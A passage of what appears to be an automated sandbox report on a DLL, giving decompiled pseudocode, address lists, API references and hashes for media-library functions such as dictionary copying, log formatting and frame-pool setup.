				void* _t323;
				int _t324;
				void* _t327;
				void* _t330;
				void* _t332;
				void* _t333;
				signed int _t335;
				void _t337;
				void* _t338;
				signed char* _t340;
				void* _t341;
				signed short* _t342;
				void _t343;
				signed int _t344;
				void* _t345;
				void* _t346;
				void** _t347;

				_t345 = __eax;
				_t347 = _t346 - 0x4c;
				_t347[8] = __ecx;
				 *((intOrPtr*)(__eax + 0x54)) =  *((intOrPtr*)(__edx + 0x54));
				 *((intOrPtr*)(__eax + 0x5c)) =  *((intOrPtr*)(__edx + 0x5c));
				 *((intOrPtr*)(__eax + 0x60)) =  *((intOrPtr*)(__edx + 0x60));
				 *((intOrPtr*)(__eax + 0x58)) =  *((intOrPtr*)(__edx + 0x58));
				 *((intOrPtr*)(__eax + 0x130)) =  *((intOrPtr*)(__edx + 0x130));
				 *((intOrPtr*)(__eax + 0x134)) =  *((intOrPtr*)(__edx + 0x134));
				 *((intOrPtr*)(__eax + 0x138)) =  *((intOrPtr*)(__edx + 0x138));
				 *((intOrPtr*)(__eax + 0x68)) =  *((intOrPtr*)(__edx + 0x68));
				 *((intOrPtr*)(__eax + 0x6c)) =  *((intOrPtr*)(__edx + 0x6c));
				 *((intOrPtr*)(__eax + 0x13c)) =  *((intOrPtr*)(__edx + 0x13c));
				 *((intOrPtr*)(__eax + 0x160)) =  *((intOrPtr*)(__edx + 0x160));
				 *((intOrPtr*)(__eax + 0x164)) =  *((intOrPtr*)(__edx + 0x164));
				 *((intOrPtr*)(__eax + 0x90)) =  *((intOrPtr*)(__edx + 0x90));
				 *((intOrPtr*)(__eax + 0x94)) =  *((intOrPtr*)(__edx + 0x94));
				 *((intOrPtr*)(__eax + 0x98)) =  *((intOrPtr*)(__edx + 0x98));
				 *((intOrPtr*)(__eax + 0x9c)) =  *((intOrPtr*)(__edx + 0x9c));
				 *((intOrPtr*)(__eax + 0xa8)) =  *((intOrPtr*)(__edx + 0xa8));
				 *((intOrPtr*)(__eax + 0x70)) =  *((intOrPtr*)(__edx + 0x70));
				 *((intOrPtr*)(__eax + 0x74)) =  *((intOrPtr*)(__edx + 0x74));
				 *((intOrPtr*)(__eax + 0x8c)) =  *((intOrPtr*)(__edx + 0x8c));
				 *((intOrPtr*)(__eax + 0x108)) =  *((intOrPtr*)(__edx + 0x108));
				 *((intOrPtr*)(__eax + 0x10c)) =  *((intOrPtr*)(__edx + 0x10c));
				 *((intOrPtr*)(__eax + 0x124)) =  *((intOrPtr*)(__edx + 0x124));
				 *((intOrPtr*)(__eax + 0x110)) =  *((intOrPtr*)(__edx + 0x110));
				 *((intOrPtr*)(__eax + 0x114)) =  *((intOrPtr*)(__edx + 0x114));
				 *((intOrPtr*)(__eax + 0x78)) =  *((intOrPtr*)(__edx + 0x78));
				 *((intOrPtr*)(__eax + 0x7c)) =  *((intOrPtr*)(__edx + 0x7c));
				 *((intOrPtr*)(__eax + 0xa0)) =  *((intOrPtr*)(__edx + 0xa0));
				 *((intOrPtr*)(__eax + 0xa4)) =  *((intOrPtr*)(__edx + 0xa4));
				_t347[6] = __edx;
				_t304 =  *(__edx + 0x100);
				_t289 =  *(__edx + 0x104);
				 *((intOrPtr*)(__eax + 0x88)) =  *((intOrPtr*)(__edx + 0x88));
				 *(__eax + 0x100) =  *(__edx + 0x100);
				 *(__eax + 0x104) =  *(__edx + 0x104);
				 *((intOrPtr*)(__eax + 0x80)) =  *((intOrPtr*)(__edx + 0x80));
				 *((intOrPtr*)(__eax + 0x84)) =  *((intOrPtr*)(__edx + 0x84));
				 *((intOrPtr*)(__eax + 0xe8)) =  *((intOrPtr*)(__edx + 0xe8));
				 *((intOrPtr*)(__eax + 0x11c)) =  *((intOrPtr*)(__edx + 0x11c));
				 *((intOrPtr*)(__eax + 0xf0)) =  *((intOrPtr*)(__edx + 0xf0));
				 *((intOrPtr*)(__eax + 0xf4)) =  *((intOrPtr*)(__edx + 0xf4));
				 *((intOrPtr*)(__eax + 0xf8)) =  *((intOrPtr*)(__edx + 0xf8));
				 *((intOrPtr*)(__eax + 0xec)) =  *((intOrPtr*)(__edx + 0xec));
				 *((intOrPtr*)(__eax + 0xfc)) =  *((intOrPtr*)(__edx + 0xfc));
				_t347[2] = 0;
				_t347[1] =  *(__edx + 0x118);
				 *_t347 = __eax + 0x118;
				L10011D20();
				_t321 = _t347[6];
				if( *((intOrPtr*)(_t321 + 0xe4)) <= 0) {
					L31:
					_t347[6] = _t321;
					_t347[1] =  *(_t321 + 0x12c);
					 *_t347 = _t345 + 0x12c;
					_t290 = E1000A480(_t289, _t326, _t334, _t345);
					_t347[1] =  *(_t347[6] + 0x140);
					 *_t347 = _t345 + 0x140;
					return E1000A480(_t290, _t326, _t334, _t345) | _t290;
				} else {
					_t347[6] = 0;
					do {
						_t334 = _t347[6];
						_t289 =  *( *((intOrPtr*)(_t321 + 0xe0)) + _t347[6] * 4);
						_t326 =  *_t289;
						if(_t326 != 0 ||  *((intOrPtr*)(_t321 + 0x44)) ==  *((intOrPtr*)(_t345 + 0x44)) &&  *((intOrPtr*)(_t321 + 0x48)) ==  *((intOrPtr*)(_t345 + 0x48))) {
							if(_t347[8] != 0) {
								_t347[0xa] = _t321;
								 *_t347 =  *(_t289 + 8);
								_t251 = L10009DC0(_t289, _t304, _t326, _t334);
								_t347[0xf] = _t251;
								_t335 = _t251;
								if(_t251 == 0) {
									L19:
									 *_t347 =  &(_t347[0xf]);
									E1000A000(_t289, _t335);
									if( *(_t345 + 0xe4) > 0) {
										_t291 = 0;
										do {
											_t327 =  *(_t345 + 0xe0) + _t291 * 4;
											_t291 = _t291 + 1;
											_t337 =  *_t327;
											_t338 = _t337 + 0xc;
											 *_t347 = _t337 + 0x10;
											E1000A000(_t291, _t338);
											 *_t347 = _t338;
											L10011CC0();
											 *_t347 = _t327;
											E100290E0();
										} while (_t291 <  *(_t345 + 0xe4));
									}
									goto L22;
								} else {
									_t259 =  *(_t345 + 0xe4);
									if(_t259 > 0x1ffffffe) {
										goto L19;
									} else {
										_t347[1] = 4 + _t259 * 4;
										 *_t347 =  *(_t345 + 0xe0);
										_t262 = L10028DA0();
										if(_t262 == 0) {
											goto L19;
										} else {
											 *(_t345 + 0xe0) = _t262;
											 *_t347 = 0x14;
											_t263 = E10029100();
											if(_t263 == 0) {
												goto L19;
											} else {
												_t263[4] = _t335;
												_t323 =  *(_t335 + 4);
												 *_t263 = _t326;
												_t263[2] =  *(_t335 + 8);
												_t307 =  *(_t345 + 0xe4);
												_t263[1] = _t323;
												_t347[0xb] = _t323;
												 *(_t345 + 0xe4) = _t307 + 1;
												 *( *(_t345 + 0xe0) + _t307 * 4) = _t263;
												_t340 =  *(_t289 + 4);
												_t347[7] =  *(_t289 + 8);
												_t330 = _t323;
												_t324 = _t347[0xa];
												_t347[9] = _t340;
												if(_t347[7] >= 8) {
													if((_t330 & 0x00000001) != 0) {
														_t308 =  *_t340 & 0x000000ff;
														_t330 = _t330 + 1;
														_t347[0xa] = _t308;
														 *(_t330 - 1) = _t308;
														_t347[7] = _t347[7] - 1;
														_t347[9] = _t347[9] + 1;
														if((_t330 & 0x00000002) != 0) {
															goto L34;
														}
													} else {
														if((_t330 & 0x00000002) != 0) {
															L34:
															_t342 = _t347[9];
															_t330 = _t330 + 2;
															 *((short*)(_t330 - 2)) =  *_t342 & 0x0000ffff;
															_t347[7] = _t347[7] - 2;
															_t347[9] =  &(_t342[1]);
														}
													}
													if((_t330 & 0x00000004) != 0) {
														_t341 = _t347[9];
														_t330 = _t330 + 4;
														 *(_t330 - 4) =  *_t341;
														_t347[7] = _t347[7] - 4;
														_t347[9] = _t341 + 4;
													}
												}
												_t334 = _t347[9];
												_t311 = _t347[7];
												_t264 = memcpy(_t330, _t334, _t311);
												_t347 =  &(_t347[3]);
												_t326 = _t334 + _t311 + _t311;
												goto L8;
											}
										}
									}
								}
							} else {
								_t347[7] = _t321;
								 *_t347 =  *(_t289 + 0x10);
								_t269 = L10009FC0(_t289, _t304);
								_t343 =  *_t289;
								_t347[0xf] = _t269;
								_t332 = _t269;
								if(_t269 == 0) {
									L23:
									 *_t347 =  &(_t347[0xf]);
									E1000A000(_t289, _t343);
									if( *(_t345 + 0xe4) > 0) {
										_t344 = _t347[8];
										do {
											_t333 =  *(_t345 + 0xe0) + _t344 * 4;
											_t344 = _t344 + 1;
											_t293 =  *_t333;
											_t294 = _t293 + 0xc;
											 *_t347 = _t293 + 0x10;
											E1000A000(_t294, _t344);
											 *_t347 = _t294;
											L10011CC0();
											 *_t347 = _t333;
											E100290E0();
										} while (_t344 <  *(_t345 + 0xe4));
									}
									L22:
									 *(_t345 + 0xe4) = 0;
									 *_t347 = _t345 + 0xe0;
									E100290E0();
									return 0xfffffff4;
								} else {
									_t275 =  *(_t345 + 0xe4);
									if(_t275 > 0x1ffffffe) {
										goto L23;
									} else {
										_t347[1] = 4 + _t275 * 4;
										 *_t347 =  *(_t345 + 0xe0);
										_t278 = L10028DA0();
										if(_t278 == 0) {
											goto L23;
										} else {
											 *(_t345 + 0xe0) = _t278;
											 *_t347 = 0x14;
											_t264 = E10029100();
											if(_t264 == 0) {
												goto L23;
											} else {
												 *(_t264 + 0x10) = _t332;
												_t324 = _t347[7];
												 *((intOrPtr*)(_t264 + 4)) =  *((intOrPtr*)(_t332 + 4));
												 *_t264 = _t343;
												_t334 =  *(_t345 + 0xe0);
												 *((intOrPtr*)(_t264 + 8)) =  *((intOrPtr*)(_t332 + 8));
												_t315 =  *(_t345 + 0xe4);
												_t326 = _t315 + 1;
												 *(_t345 + 0xe4) = _t315 + 1;
												 *( *(_t345 + 0xe0) + _t315 * 4) = _t264;
												L8:
												_t347[7] = _t324;
												_t347[2] = 0;
												_t304 =  *(_t289 + 0xc);
												 *_t347 = _t264 + 0xc;
												_t347[1] =  *(_t289 + 0xc);
												L10011D20();
												_t321 = _t347[7];
												goto L9;
											}
										}
									}
								}
							}
						} else {
							goto L9;
						}
						goto L35;
						L9:
						_t347[6] = _t347[6] + 1;
					} while ( *((intOrPtr*)(_t321 + 0xe4)) > _t347[6]);
					goto L31;
				}
				L35:
			}

0x1001a6c1
0x1001a6c6
0x1001a6c9
0x1001a6d6
0x1001a6dc
0x1001a6e2
0x1001a6e8
0x1001a6f1
0x1001a6fd
0x1001a709
0x1001a715
0x1001a71e
0x1001a727
0x1001a733
0x1001a739
0x1001a73f
0x1001a751
0x1001a75d
0x1001a769
0x1001a775
0x1001a781
0x1001a78a
0x1001a793
0x1001a79f
0x1001a7ab
0x1001a7b7
0x1001a7bd
0x1001a7c6
0x1001a7cf
0x1001a7d8
0x1001a7e1
0x1001a7e7
0x1001a7f3
0x1001a7f7
0x1001a7fd
0x1001a803
0x1001a80f
0x1001a815
0x1001a81b
0x1001a827
0x1001a833
0x1001a83f
0x1001a84b
0x1001a857
0x1001a863
0x1001a86f
0x1001a87b
0x1001a883
0x1001a88d
0x1001a897
0x1001a89a
0x1001a89f
0x1001a8ab
0x1001ab88
0x1001ab88
0x1001ab92
0x1001ab9c
0x1001aba8
0x1001abb0
0x1001abba
0x1001abcb
0x1001a8b1
0x1001a8b3
0x1001a9b3
0x1001a9b9
0x1001a9bd
0x1001a9c0
0x1001a9c4
0x1001a9dc
0x1001a8c0
0x1001a8c7
0x1001a8ca
0x1001a8cf
0x1001a8d5
0x1001a8d7
0x1001aa80
0x1001aa84
0x1001aa87
0x1001aa94
0x1001aa96
0x1001aa98
0x1001aa9e
0x1001aaa1
0x1001aaa2
0x1001aaa7
0x1001aaaa
0x1001aaad
0x1001aab2
0x1001aab5
0x1001aaba
0x1001aabd
0x1001aac2
0x1001aa98
0x00000000
0x1001a8dd
0x1001a8dd
0x1001a8e8
0x00000000
0x1001a8ee
0x1001a8f5
0x1001a8ff
0x1001a902
0x1001a909
0x00000000
0x1001a90f
0x1001a90f
0x1001a915
0x1001a91c
0x1001a923
0x00000000
0x1001a929
0x1001a929
0x1001a92f
0x1001a932
0x1001a93a
0x1001a93d
0x1001a943
0x1001a946
0x1001a94d
0x1001a956
0x1001a959
0x1001a95c
0x1001a960
0x1001a962
0x1001a96b
0x1001a96f
0x1001ab46
0x1001abd0
0x1001abd3
0x1001abd4
0x1001abd8
0x1001abdf
0x1001abea
0x1001abee
0x00000000
0x00000000
0x1001ab4c
0x1001ab52
0x1001ac00
0x1001ac00
0x1001ac04
0x1001ac0a
0x1001ac11
0x1001ac16
0x1001ac16
0x1001ab52
0x1001ab5e
0x1001ab64
0x1001ab68
0x1001ab6d
0x1001ab73
0x1001ab78
0x1001ab78
0x1001ab5e
0x1001a975
0x1001a979
0x1001a97d
0x1001a97d
0x1001a97d
0x00000000
0x1001a97d
0x1001a923
0x1001a909
0x1001a8e8
0x1001a9e2
0x1001a9e2
0x1001a9e9
0x1001a9ec
0x1001a9f1
0x1001a9f3
0x1001a9f9
0x1001a9fb
0x1001aaf0
0x1001aaf4
0x1001aaf7
0x1001ab04
0x1001ab06
0x1001ab0a
0x1001ab10
0x1001ab13
0x1001ab14
0x1001ab19
0x1001ab1c
0x1001ab1f
0x1001ab24
0x1001ab27
0x1001ab2c
0x1001ab2f
0x1001ab34
0x1001ab3c
0x1001aaca
0x1001aad2
0x1001aad8
0x1001aadb
0x1001aaec
0x1001aa01
0x1001aa01
0x1001aa0c
0x00000000
0x1001aa12
0x1001aa19
0x1001aa23
0x1001aa26
0x1001aa2d
0x00000000
0x1001aa33
0x1001aa33
0x1001aa39
0x1001aa40
0x1001aa47
0x00000000
0x1001aa4d
0x1001aa4d
0x1001aa53
0x1001aa57
0x1001aa5d
0x1001aa5f
0x1001aa65
0x1001aa68
0x1001aa6e
0x1001aa71
0x1001aa77
0x1001a97f
0x1001a97f
0x1001a988
0x1001a98c
0x1001a98f
0x1001a992
0x1001a996
0x1001a99b
0x00000000
0x1001a99b
0x1001aa47
0x1001aa2d
0x1001aa0c
0x1001a9fb
0x00000000
0x00000000
0x00000000
0x00000000
0x1001a99f
0x1001a99f
0x1001a9a7
0x00000000
0x1001a9b3
0x00000000

APIs

mv_dict_copy.F072 ref: 1001A89A
mv_dict_copy.F072 ref: 1001A996
mv_buffer_ref.F072 ref: 1001A9EC
mv_realloc.F072 ref: 1001AA26
mv_mallocz.F072 ref: 1001AA40
mv_buffer_replace.F072 ref: 1001AB9F
mv_buffer_replace.F072 ref: 1001ABBD

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_buffer_replacemv_dict_copy$mv_buffer_refmv_malloczmv_realloc
String ID:
API String ID: 1780483662-0
Opcode ID: 3861e8adcd179e933f9009bb7fa2dda5d09e50d5a5c7a36caa6a21cb84e0f4c5
Instruction ID: 4f31049026451c5eff94bb509f486bba90e5ec7b997a8c78013bd9afd2acced3
Opcode Fuzzy Hash: 3861e8adcd179e933f9009bb7fa2dda5d09e50d5a5c7a36caa6a21cb84e0f4c5
Instruction Fuzzy Hash: 3EF1C3B49043468FCB64CF29C5807D9BBE1FF49350F458A6EE9899B312D730A984CF91

Uniqueness

Uniqueness Score: -1.00%

Function 10026250 Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 193
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E10026250() {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t100;
				signed int _t104;
				void* _t108;
				char* _t112;
				intOrPtr _t127;
				char* _t128;
				void* _t131;
				char* _t132;
				signed int _t136;
				signed int _t138;
				void* _t139;
				signed int _t141;
				signed int _t143;
				signed int _t145;
				signed int _t147;
				signed int _t149;
				signed int _t152;
				signed int _t155;
				signed int _t158;
				signed int _t161;
				signed int _t162;
				signed int _t164;
				signed int _t166;
				void* _t167;
				signed int* _t168;

				_t168 = _t167 - L100918A0(0x103c);
				_t136 = _t168[0x414];
				if(_t136 == 0) {
					_t168[2] = 1;
					 *_t168 =  &(_t168[0xc]);
					_t168[1] = 0;
					L10008880(0, 0, 1, 1);
					_t168[2] = 1;
					_t161 =  &(_t168[0x20c]);
					_t168[1] = 0;
					_t158 =  &(_t168[0x30c]);
					 *_t168 =  &(_t168[0x10c]);
					L10008880(0, _t158, _t161, 1);
					_t168[1] = 0;
					_t168[2] = 1;
					 *_t168 = _t161;
					L10008880(0, _t158, _t161, 1);
					_t168[2] = 0x10000;
					_t168[1] = 0;
					 *_t168 = _t158;
					L10008880(0, _t158, _t161, 1);
					_t100 =  *(_t168[0x41a]) & 0xffffff00 |  *(_t168[0x41a]) != 0x00000000;
					L8:
					if(_t168[0x415] >= 0xfffffff9 && _t100 != 0 && ( *0x100d76ac & 0x00000002) != 0) {
						_t67 = _t168[0x415] + 8; // 0x101
						_t152 = _t67;
						_t112 = 0x100b6d3b;
						if(_t152 <= 0x40) {
							_t112 =  *(0x100b6f40 + _t152 * 4);
						}
						_t168[2] = _t112;
						_t168[1] = "[%s] ";
						 *_t168 = _t161;
						L100089C0();
					}
					 *_t168 = _t158;
					_t168[2] = _t168[0x417];
					_t168[1] = _t168[0x416];
					L10008B70();
					_t104 = _t168[0xc];
					_t141 = _t168[0x10c];
					_t162 = _t168[0x20c];
					_t138 = _t168[0x30c];
					if( *_t104 != 0 ||  *_t141 != 0 ||  *_t162 != 0) {
						L12:
						_t164 = _t168[0x30d];
						_t147 = 0;
						if(_t164 != 0 && _t168[0x30e] >= _t164) {
							_t149 =  *(_t138 + _t164 - 1) & 0x000000ff;
							_t168[0xa] = _t149 == 0xa;
							_t147 = (_t149 & 0xffffff00 | _t149 == 0x0000000d | _t168[0xa]) & 0x000000ff;
						}
						 *(_t168[0x41a]) = _t147;
						goto L16;
					} else {
						if( *_t138 == 0) {
							L16:
							_t168[3] = _t104;
							_t168[2] = "%s%s%s%s";
							_t168[6] = _t138;
							_t168[5] = _t162;
							_t168[4] = _t141;
							_t168[1] = _t168[0x419];
							 *_t168 = _t168[0x418];
							_t108 = L10025AE0();
							 *_t168 = _t158;
							_t168[1] = 0;
							_t139 = _t108;
							E10009690(_t139, _t141, _t158, _t162);
							return _t139;
						}
						goto L12;
					}
				}
				_t168[2] = 1;
				_t166 =  &(_t168[0x10c]);
				_t168[1] = 0;
				 *_t168 =  &(_t168[0xc]);
				_t161 =  &(_t168[0x20c]);
				_t168[0xa] =  *_t136;
				L10008880(_t136, 0x10000, _t161, _t166);
				_t168[2] = 1;
				_t168[1] = 0;
				 *_t168 = _t166;
				L10008880(_t136, 0x10000, _t161, _t166);
				_t168[2] = 1;
				_t168[1] = 0;
				 *_t168 = _t161;
				L10008880(_t136, 0x10000, _t161, _t166);
				_t168[2] = 0x10000;
				_t158 =  &(_t168[0x30c]);
				_t168[1] = 0;
				 *_t168 = _t158;
				L10008880(_t136, _t158, _t161, _t166);
				_t155 = _t168[0xa];
				_t143 = 0 |  *(_t168[0x41a]) != 0x00000000;
				_t100 = _t143;
				if(_t155 != 0 && _t143 != 0) {
					_t127 =  *((intOrPtr*)(_t155 + 0x14));
					if(_t127 != 0) {
						_t145 =  *(_t136 + _t127);
						if(_t145 != 0) {
							_t131 =  *_t145;
							if(_t131 != 0) {
								 *_t168 = _t145;
								_t168[0xb] = _t155;
								_t168[0xa] = _t145;
								_t132 =  *((intOrPtr*)(_t131 + 4))();
								_t168[3] = _t168[0xa];
								_t168[2] = _t132;
								_t168[1] = "[%s @ %p] ";
								 *_t168 =  &(_t168[0xc]);
								L100089C0();
								_t155 = _t168[0xb];
							}
						}
					}
					 *_t168 = _t136;
					_t128 =  *((intOrPtr*)(_t155 + 4))();
					_t168[3] = _t136;
					_t168[1] = "[%s @ %p] ";
					 *_t168 = _t166;
					_t168[2] = _t128;
					L100089C0();
					_t100 = _t168[0x41a] & 0xffffff00 |  *(_t168[0x41a]) != 0x00000000;
				}
			}

0x1002625e
0x10026260
0x10026269
0x100264c7
0x100264d1
0x100264de
0x100264e2
0x100264ee
0x100264f2
0x100264f9
0x100264fd
0x10026504
0x10026507
0x1002650e
0x10026512
0x10026516
0x10026519
0x10026523
0x10026529
0x1002652d
0x10026530
0x10026540
0x1002637a
0x10026382
0x1002648c
0x1002648c
0x1002648f
0x10026497
0x10026499
0x10026499
0x100264a0
0x100264a9
0x100264ad
0x100264b0
0x100264b0
0x1002638c
0x10026396
0x100263a1
0x100263a5
0x100263aa
0x100263ae
0x100263b5
0x100263bc
0x100263c6
0x100263d1
0x100263d1
0x100263d8
0x100263dc
0x100263e7
0x100263ef
0x100263fe
0x100263fe
0x10026408
0x00000000
0x10026469
0x1002646c
0x1002640b
0x1002640b
0x10026414
0x1002641f
0x10026423
0x10026427
0x1002642b
0x10026436
0x10026439
0x10026440
0x10026443
0x10026447
0x10026449
0x1002645a
0x1002645a
0x00000000
0x10026470
0x100263c6
0x1002627b
0x1002627f
0x10026288
0x10026290
0x10026293
0x1002629a
0x1002629e
0x100262a8
0x100262ae
0x100262b2
0x100262b5
0x100262c1
0x100262c5
0x100262c9
0x100262cc
0x100262d3
0x100262d7
0x100262de
0x100262e2
0x100262e5
0x100262f1
0x100262f9
0x100262fe
0x10026300
0x10026306
0x1002630b
0x1002630d
0x10026312
0x10026314
0x10026318
0x1002631a
0x1002631d
0x10026321
0x10026325
0x1002632c
0x10026330
0x10026339
0x10026341
0x10026344
0x10026349
0x10026349
0x10026318
0x10026312
0x1002634d
0x10026350
0x10026358
0x1002635c
0x10026360
0x10026363
0x10026367
0x10026377
0x10026377

APIs

mv_bprint_init.F072 ref: 1002629E
mv_bprint_init.F072 ref: 100262B5
mv_bprint_init.F072 ref: 100262CC
mv_bprint_init.F072 ref: 100262E5
mv_bprintf.F072 ref: 10026344
mv_bprintf.F072 ref: 10026367
mv_vbprintf.F072 ref: 100263A5
mv_bprint_finalize.F072 ref: 10026449
mv_bprint_init.F072 ref: 100264E2
mv_bprint_init.F072 ref: 10026507
mv_bprint_init.F072 ref: 10026519
mv_bprint_init.F072 ref: 10026530

Strings

%s%s%s%s, xrefs: 1002640F
[%s @ %p] , xrefs: 10026334, 10026353
[%s] , xrefs: 100264A4

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_bprint_init$mv_bprintf$mv_bprint_finalizemv_vbprintf
String ID: %s%s%s%s$[%s @ %p] $[%s]
API String ID: 2514531573-1798253436
Opcode ID: 3f2bd632272b9df47179aee3b67c56da7bd7b79c66d3fadd9b491fc2fadde794
Instruction ID: c71d304a02298176911f7b5d9492a31840536d8b4fe4b07b2d7bce997b72d9a0
Opcode Fuzzy Hash: 3f2bd632272b9df47179aee3b67c56da7bd7b79c66d3fadd9b491fc2fadde794
Instruction Fuzzy Hash: 808119B49097809FD350DF28D48069FBBE1FF88340F85892EE8C887355DB75AA84CB42

Uniqueness

Uniqueness Score: -1.00%

Function 100202B0 Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 171COMMON

Download Yara Rule

APIs

mv_get_pix_fmt_name.F072 ref: 10020395
mv_log.F072 ref: 100203B3
mv_log.F072 ref: 100203D6
mv_log.F072 ref: 100203FD

Strings

Error creating an internal frame pool, xrefs: 100203C6
P010, xrefs: 100204BE
NV12, xrefs: 1002040C
Failed to open device handle, xrefs: 10020522
Unknown surface type: %lu, xrefs: 100203E8
Unsupported pixel format: %s, xrefs: 100203A1

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_log$mv_get_pix_fmt_name
String ID: Error creating an internal frame pool$Failed to open device handle$NV12$P010$Unknown surface type: %lu$Unsupported pixel format: %s
API String ID: 2830795485-4196069199
Opcode ID: 7e434e73dff374732bf92a6c6b461502dd5c9fdd604f663b4050518d1b8bf5f6
Instruction ID: dbfc9fc73534cf50ff89b72e71a8ef33aba9b4af1470f45bc046c89c466e1acb
Opcode Fuzzy Hash: 7e434e73dff374732bf92a6c6b461502dd5c9fdd604f663b4050518d1b8bf5f6
Instruction Fuzzy Hash: 3371C2B46087459FC750DF29D58460ABBE1FF88300F91C96EF9998B356E774E840DB42

Uniqueness

Uniqueness Score: -1.00%

Function 1001E450 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 207
COMMON

Download Yara Rule

C-Code - Quality: 28%

			E1001E450(intOrPtr __ebx, intOrPtr __edi, intOrPtr __esi) {
				signed int _t213;
				signed int _t214;
				intOrPtr _t215;
				signed int _t219;
				signed int _t220;
				signed int _t221;
				signed int _t224;
				signed int _t227;
				signed int _t228;
				signed int _t230;
				signed int _t247;
				signed int _t253;
				signed int _t254;
				signed int _t255;
				signed int _t257;
				void* _t258;
				void* _t259;
				signed int _t261;
				void* _t262;
				void* _t263;
				signed char _t267;
				signed int _t268;
				signed int _t269;
				signed int _t273;
				intOrPtr _t275;
				intOrPtr _t280;
				signed int _t281;
				signed int _t282;
				signed int _t283;
				intOrPtr _t289;
				signed int _t291;
				signed int _t297;
				signed int _t300;
				signed int _t302;
				signed int _t304;
				signed short* _t309;
				signed short* _t310;
				int _t314;
				signed int _t324;
				intOrPtr* _t326;
				intOrPtr _t327;
				signed char _t335;
				short* _t336;
				signed char _t337;
				short* _t338;
				signed int _t339;
				signed int _t341;
				char* _t343;
				signed int _t345;
				signed int _t347;
				signed int _t349;
				signed int _t352;
				void* _t353;
				void* _t356;
				signed int _t362;
				signed int _t364;
				signed int _t368;
				signed int _t370;
				signed int _t373;
				signed short* _t374;
				signed short* _t375;
				signed int _t376;
				void* _t378;
				signed int _t381;
				intOrPtr _t382;
				signed int _t383;
				signed int _t385;
				signed int _t388;
				void* _t389;
				intOrPtr* _t390;
				signed int* _t392;
				signed int* _t396;

				_t390 = _t389 - 0x4c;
				 *((intOrPtr*)(_t390 + 0x44)) = __edi;
				 *((intOrPtr*)(_t390 + 0x3c)) = __ebx;
				_t343 =  *(_t390 + 0x54);
				 *((intOrPtr*)(_t390 + 0x48)) = _t382;
				_t289 =  *((intOrPtr*)(_t390 + 0x50));
				 *((intOrPtr*)(_t390 + 0x40)) = __esi;
				 *(_t390 + 0x28) =  *(_t390 + 0x58);
				_t383 =  *(_t289 + 0x50);
				_t362 =  *(_t289 + 0x128);
				 *(_t390 + 0x24) = _t383;
				if(_t343[0x128] == 0) {
					_t213 = _t362;
					goto L83;
				} else {
					__eflags = __esi;
					__edx =  *(__eax + 4);
					if(__esi == 0) {
						__eax = __edi[0x50];
						__eflags =  *((intOrPtr*)(__edx + 0x24)) - __edi[0x50];
						if( *((intOrPtr*)(__edx + 0x24)) != __edi[0x50]) {
							goto L91;
						} else {
							 *(__edx + 4) =  *( *(__edx + 4));
							__eax =  *( *( *(__edx + 4)) + 0x50);
							__eflags = __eax;
							if(__eax == 0) {
								goto L91;
							} else {
								goto L79;
							}
						}
					} else {
						__eax =  *(__esi + 4);
						__eflags = __eax - __edx;
						if(__eax == __edx) {
							__ecx =  *(__eax + 0x28);
							__eflags = __edi[0x50] -  *(__eax + 0x28);
							if(__edi[0x50] !=  *(__eax + 0x28)) {
								goto L66;
							} else {
